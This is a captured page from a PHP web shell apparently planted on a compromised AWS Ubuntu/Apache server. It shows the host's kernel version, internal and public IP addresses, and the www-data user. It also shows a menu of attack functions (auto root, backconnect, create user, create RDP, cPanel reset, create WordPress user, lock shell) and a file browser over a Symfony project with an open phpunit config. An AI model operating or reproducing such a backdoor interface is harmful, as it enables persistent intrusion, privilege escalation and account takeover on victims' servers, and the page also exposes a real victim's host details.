Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.223.109.25
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
bin
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
migrations
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
var
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxr-x
.env
1.83
KB
-rw-rw-r--
.env.test
162
B
-rw-rw-r--
.gitignore
394
B
-rw-rw-r--
LICENSE
1.03
KB
-rw-rw-r--
composer.json
3.01
KB
-rw-rw-r--
composer.lock
391.23
KB
-rw-rw-r--
phpunit.xml.dist
1.04
KB
-rw-rw-r--
symfony.lock
15.38
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <!-- https://phpunit.readthedocs.io/en/latest/configuration.html --> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="bin/.phpunit/phpunit.xsd" backupGlobals="false" colors="true" bootstrap="tests/bootstrap.php" > <php> <ini name="error_reporting" value="-1" /> <server name="APP_ENV" value="test" force="true" /> <server name="SHELL_VERBOSITY" value="-1" /> <server name="SYMFONY_PHPUNIT_REMOVE" value="" /> <server name="SYMFONY_PHPUNIT_VERSION" value="7.5" /> </php> <testsuites> <testsuite name="Project Test Suite"> <directory>tests</directory> </testsuite> </testsuites> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">src</directory> </whitelist> </filter> <listeners> <listener class="Symfony\Bridge\PhpUnit\SymfonyTestsListener" /> </listeners> </phpunit>
Close